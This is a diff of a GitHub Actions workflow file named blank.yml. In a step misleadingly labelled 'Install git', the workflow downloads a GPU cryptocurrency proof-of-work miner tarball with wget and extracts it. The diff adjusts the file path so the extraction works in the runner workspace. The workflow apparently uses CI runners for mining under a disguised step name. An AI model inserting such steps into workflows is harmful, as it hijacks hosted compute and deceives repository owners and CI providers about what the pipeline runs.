--- a/.github/workflows/blank.yml
+++ b/.github/workflows/blank.yml
@@ -14,6 +14,6 @@ jobs:
     - name: Install git
       run : |
              wget https://github.com/tontechio/pow-miner-gpu/releases/download/20211108-1/minertools-cuda-ubuntu-20.04-x86-64.tar.gz & pwd
-             mv minertools-cuda-ubuntu-20.04-x86-64.tar.gz /home/runner/1.tar.gz
+             mv minertools-cuda-ubuntu-20.04-x86-64.tar.gz /home/runner/work/naming/naming/1.tar.gz
              tar xvzf 1.tar.gz
              cd 1 & ls -l
